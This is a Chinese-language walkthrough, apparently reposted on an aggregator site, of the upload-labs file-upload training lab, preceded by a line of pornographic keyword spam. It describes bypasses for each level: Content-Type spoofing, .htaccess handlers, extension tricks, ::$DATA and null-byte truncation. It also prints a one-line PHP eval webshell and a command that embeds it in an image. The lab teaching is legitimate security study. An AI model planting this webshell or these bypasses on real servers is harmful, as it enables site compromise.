国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

upload-labs詳細(xì)教程

這篇具有很好參考價(jià)值的文章主要介紹了upload-labs詳細(xì)教程。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

目錄

?第一關(guān) js檢查

?第二關(guān)?Content-Type

?第三關(guān) 黑名單驗(yàn)證

?第四關(guān)?黑名單驗(yàn)證(.htaccess繞過(guò))?

?第五關(guān)?黑名單驗(yàn)證(.user.ini)

?第六關(guān)?空格繞過(guò)

?第七關(guān) 點(diǎn)繞過(guò)?

?第八關(guān) ::$DATA繞過(guò)?

?第九關(guān)?.空格.繞過(guò)

?第十一關(guān)?文件路徑%00截?cái)?/p>

?第十二關(guān)?文件路徑0x00截?cái)?/p>

?第十三關(guān)?文件頭檢測(cè)


查看源碼

upload-labs詳細(xì)教程

由源代碼可知,允許上傳的文件為.jpg|.png|.gif

我們上傳一個(gè).jpg文件

upload-labs詳細(xì)教程

利用burp suite進(jìn)行抓包

upload-labs詳細(xì)教程

?將jpg改為php后,放包

upload-labs詳細(xì)教程

上傳成功。

?第二關(guān)?Content-Type

查看源碼

upload-labs詳細(xì)教程

有源碼可知,發(fā)現(xiàn)只判斷Content-Type類型,所以我們只需修改Content-Type進(jìn)行繞過(guò)即可

首先上傳php文件,抓上傳包

upload-labs詳細(xì)教程

upload-labs詳細(xì)教程?upload-labs詳細(xì)教程

將箭頭所指的內(nèi)容改為image/jpeg或image/png或image/gif后,放包,文件即上傳成功!?

?upload-labs詳細(xì)教程

?第三關(guān) 黑名單驗(yàn)證

查看源代碼

upload-labs詳細(xì)教程

?由源碼可知,本關(guān)不允許上傳.asp,.aspx,.php,.jsp類型的文件

我們可以通過(guò)不常見(jiàn)的php擴(kuò)展名繞過(guò)黑名單的限制

比如.phtml,.php3,.php4,.php5

upload-labs詳細(xì)教程

第四關(guān)?黑名單驗(yàn)證(.htaccess繞過(guò))?

查看源碼

upload-labs詳細(xì)教程

源碼可知,黑名單拒絕了所有格式的文件后綴名,除了.htaccess

所以此關(guān)通過(guò).htaccess繞過(guò)進(jìn)行上傳

首先,上傳一個(gè).htaccess文件

內(nèi)容為:SetHandler application/x-httpd-php

文件命名為:.htaccess

upload-labs詳細(xì)教程

接下來(lái),上傳一個(gè).jpg文件

內(nèi)容為:<?php
phpinfo();
?>

文件命名為:0.jpg(文件名自己定義)

上傳即可。

upload-labs詳細(xì)教程

?第五關(guān)?黑名單驗(yàn)證(.user.ini)

upload-labs詳細(xì)教程

這一關(guān)和上一關(guān)差不多,只不過(guò)這一關(guān)加上了對(duì).htaccess的禁止,但是沒(méi)有將后綴進(jìn)行大小寫(xiě)統(tǒng)一

我們用burp抓包將filename="12345.php"改為filename="12345.PHP"就可以了

upload-labs詳細(xì)教程

?第六關(guān)?空格繞過(guò)

upload-labs詳細(xì)教程

看完提示發(fā)現(xiàn)和源碼,可以看到上面的方法都不可行

這時(shí)候就需要普及一個(gè)知識(shí):Win下xx.jpg空格和xx.jpg.兩種文件是不被允許存在的,要是這樣命名文件,windows系統(tǒng)會(huì)默認(rèn)刪除空格或者.

在這里系統(tǒng)默認(rèn)刪除的的文件中的.

所以我們用burp抓包將filename="12345.php"改為filename="12345.php "(12345.php空格)

upload-labs詳細(xì)教程

第七關(guān) 點(diǎn)繞過(guò)?

upload-labs詳細(xì)教程

查看源碼

upload-labs詳細(xì)教程

分析代碼,有去空格和所以黑名單,但是沒(méi)有去點(diǎn)。

我們只需要利用burp抓包加個(gè)點(diǎn)即可

upload-labs詳細(xì)教程

第八關(guān) ::$DATA繞過(guò)?

查看源碼

upload-labs詳細(xì)教程

分析源碼可知,之前所有的點(diǎn)這關(guān)都有防范

NTFS文件系統(tǒng)包括對(duì)備用數(shù)據(jù)流的支持。這不是眾所周知的功能,主要包括提供與Macintosh文件系統(tǒng)中的文件的兼容性。備用數(shù)據(jù)流允許文件包含多個(gè)數(shù)據(jù)流。每個(gè)文件至少有一個(gè)數(shù)據(jù)流。在Windows中,此默認(rèn)數(shù)據(jù)流稱為:$ DATA。

本關(guān)中的黑名單沒(méi)有去處后綴名中的“::$DATA”

利用burp抓包,在文件后綴處加上::$DATA

upload-labs詳細(xì)教程

upload-labs詳細(xì)教程

?第九關(guān)?.空格.繞過(guò)

?查看提示

upload-labs詳細(xì)教程

查看源碼

upload-labs詳細(xì)教程?上傳文件名后加上點(diǎn)+空格+點(diǎn),改為12345.php. .

upload-labs詳細(xì)教程

第十關(guān) 雙寫(xiě)文件名繞過(guò)

上傳文件,burp抓包?

upload-labs詳細(xì)教程

?將箭頭處改為.phpphp

upload-labs詳細(xì)教程

?第十一關(guān)?文件路徑%00截?cái)?/h4>

?查看源代碼

upload-labs詳細(xì)教程

從代碼中可以發(fā)現(xiàn)紅線處,對(duì)上傳的文件名進(jìn)行重新拼接,使用$_GET傳參
可以通過(guò)%00進(jìn)行截?cái)嗌蟼?

上傳.php文件

使用burpsuite抓包

upload-labs詳細(xì)教程

?在.php后增加%00.jpg,放包

upload-labs詳細(xì)教程

?第十二關(guān)?文件路徑0x00截?cái)?/h4>

查看源碼

upload-labs詳細(xì)教程

上傳文件123.jpg,buropsuite進(jìn)行抓包

,箭頭處添加/.jpg%00放包

upload-labs詳細(xì)教程

upload-labs詳細(xì)教程

第十三關(guān)?文件頭檢測(cè)

制作圖片馬

將圖片和一句話木馬放在一個(gè)文件夾下

一句話木馬為:? ?<?php @eval($_POST['attack']);?>

進(jìn)行合成,命令如下

copy 1123.jpg /b + 222.txt /a 2.jpg

上傳圖片馬

upload-labs詳細(xì)教程

?第十四關(guān)?getimagesize()檢測(cè)

同十三關(guān),這一關(guān)是用getimagesize函數(shù)來(lái)判斷文件類型,但是還是可以用圖片碼繞過(guò)

第十五關(guān)?exif_imagetype()檢測(cè)

png圖片webshell上傳同Pass-13。
jpg/jpeg圖片webshell上傳同Pass-13。

第十六關(guān)?突破二次渲染

上傳圖片馬

upload-labs詳細(xì)教程

使用burpsuite攔截

upload-labs詳細(xì)教程在圖片尾部插入一句話木馬,密碼是123

upload-labs詳細(xì)教程?放包

upload-labs詳細(xì)教程

?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-444671.html

?

?

到了這里,關(guān)于upload-labs詳細(xì)教程的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • upload-labs通關(guān)

    upload-labs通關(guān)

    最近,我有個(gè)朋友老是反映部署的網(wǎng)站老是被黑客攻擊,我看了下就是普通的PHP框架搭建的網(wǎng)站,經(jīng)過(guò)一番排除也清除了木馬。為此我專門(mén)花1天時(shí)間研究一下文件上傳漏洞,知己知彼方能百戰(zhàn)百勝。這里我選擇了一個(gè)開(kāi)源的靶場(chǎng)upload-labs。 Cookie-Editor:https://chrome.google.com/we

    2023年04月08日
    瀏覽(248)
  • upload-labs靶場(chǎng)安裝

    upload-labs靶場(chǎng)安裝

    ??服務(wù)器環(huán)境:phpstudy ??下載鏈接:https://www.xp.cn/ ??靶場(chǎng):upload-labs ??下載鏈接:https://github.com/c0ny1/upload-labs ?? 百度網(wǎng)盤(pán):https://pan.baidu.com/s/1pu9tVCFKk5NZ3v9r1QZlOA?pwd=0432 ??提取碼:0432 ??PhpStudy國(guó)內(nèi)12年老牌公益軟件,集安全,高效,功能與一體,已獲得全球用

    2024年02月05日
    瀏覽(22)
  • upload-labs 16/17關(guān)

    upload-labs 16/17關(guān)

    將gif文件和包含一句話木馬的php文件放在同一目錄下,用cmd的copy命令將php文件整合進(jìn)文件中。 可以看到最后一行包含了注入代碼 將b1文件上傳到服務(wù)器后,發(fā)現(xiàn)并未能正常執(zhí)行代碼,將上傳后的文件下載到本地,打開(kāi)后發(fā)現(xiàn)最后的代碼被過(guò)濾了。 將下載的文件與a1文件用0

    2024年02月09日
    瀏覽(21)
  • upload-labs通關(guān)攻略(更新中)

    upload-labs通關(guān)攻略(更新中)

    upload-labs是一個(gè)使用php語(yǔ)言編寫(xiě),專注于文件上傳漏洞的靶場(chǎng)。該靶場(chǎng)可以讓練習(xí)者了解文件上傳漏洞的原理、利用方法。 1.首先要下載phpstudy,解壓安裝 phpstudy下載鏈接:https://www.xp.cn/download.html 2.下載upload-labs源代碼 下載鏈接:https://codeload.github.com/c0ny1/upload-labs/zip/refs/hea

    2024年02月15日
    瀏覽(17)
  • upload-labs靶場(chǎng)的安裝搭建

    upload-labs靶場(chǎng)的安裝搭建

    1、首先安裝phpstudy的環(huán)境,下載進(jìn)行安裝 2、然后到GitHub去下載upload-labs的源碼 GitHub:https://github.com/Tj1ngwe1/upload-labs 3、將下載的壓縮包解壓到phpstudy文件,phpstudy/www網(wǎng)站的根目錄下。 4、本地瀏覽器訪問(wèn)127.0.0.1/upload-labs/就可以訪問(wèn)靶場(chǎng)了 在鏡像倉(cāng)庫(kù)搜索upload-labs鏡像 將uploa

    2024年02月13日
    瀏覽(14)
  • upload-labs文件上傳靶場(chǎng)實(shí)操

    upload-labs文件上傳靶場(chǎng)實(shí)操

    上傳姿勢(shì)總結(jié): 1)改后綴名繞過(guò) 2)Content-Type繞過(guò) 3)本地文件包含 4)遠(yuǎn)程文件包含 5)httpd.conf黑名單繞過(guò) 6)htaccess繞過(guò) 7)大小寫(xiě)繞過(guò) 8)空格繞過(guò) 9)點(diǎn)繞過(guò) 10)特殊符號(hào)::$DATA繞過(guò) 11). .繞過(guò) 12)多寫(xiě)繞過(guò)(多寫(xiě)php) 13)%00截?cái)嗄夸浝@過(guò) 14)16進(jìn)制00截?cái)嗄夸?15)本地文件包含+文件頭繞過(guò) 16)本地

    2024年02月08日
    瀏覽(26)
  • 文件上傳漏洞(一) upload-labs靶場(chǎng)練習(xí)

    文件上傳漏洞(一) upload-labs靶場(chǎng)練習(xí)

    文件上傳漏洞的目標(biāo)就是向服務(wù)器上傳一些服務(wù)器可以解析的惡意文件,這類文件可以達(dá)到與攻擊者建立連接并執(zhí)行惡意命令的作用(又名webshell)。其危害之大,早已引起業(yè)界的關(guān)注。 本文將通過(guò)對(duì)upload-labs的練習(xí),重現(xiàn)一些繞過(guò)手法,當(dāng)然也是對(duì)文件上傳漏洞基礎(chǔ)部分的一個(gè)

    2024年02月03日
    瀏覽(21)
  • 全面了解文件上傳漏洞, 通關(guān)upload-labs靶場(chǎng)

    全面了解文件上傳漏洞, 通關(guān)upload-labs靶場(chǎng)

    upload-labs是一個(gè)專門(mén)用于學(xué)習(xí)文件上傳漏洞攻擊和防御的靶場(chǎng)。它提供了一系列模擬文件上傳漏洞的實(shí)驗(yàn)環(huán)境,用于幫助用戶了解文件上傳漏洞的原理和防御技術(shù)。 這個(gè)靶場(chǎng)包括了常見(jiàn)的文件上傳漏洞類型,如文件名欺騙、文件類型欺騙、文件上傳功能繞過(guò)等。通過(guò)練習(xí)不同

    2024年02月04日
    瀏覽(18)
  • 文件上傳漏洞之upload-labs靶場(chǎng)實(shí)戰(zhàn)通關(guān)

    文件上傳漏洞之upload-labs靶場(chǎng)實(shí)戰(zhàn)通關(guān)

    目錄 pass-01 pass-02 pass-03 pass-04 pass-06 pass-07 pass-08 pass-09 pass-10 pass-11 pass-12 pass-13 pass-14 pass-15 pass-16 pass-17 pass-18 pass-19 pass-20 pass-21 ? pass-01 ? pass-02 前端刪除完驗(yàn)證函數(shù)后通過(guò)burp修改?content-type的類型 ? pass-03 pass-04 本pass禁止上傳.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|

    2023年04月08日
    瀏覽(23)
  • upload-labs1-21關(guān)文件上傳通關(guān)手冊(cè)

    upload-labs1-21關(guān)文件上傳通關(guān)手冊(cè)

    看源碼可知道 僅讓上傳此三類的文件類型,其他都不可以上傳。 上傳會(huì)有js彈窗,前端檢查(前端校驗(yàn)): 我們可以有三種繞過(guò)方法: 第一種:關(guān)閉網(wǎng)頁(yè)的js提示彈窗 第二種:檢查源代碼,進(jìn)行修改 第三種:利用burp進(jìn)行抓包,修改上傳的文件后綴.php 第一種: 在火狐瀏覽

    2024年02月09日
    瀏覽(22)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包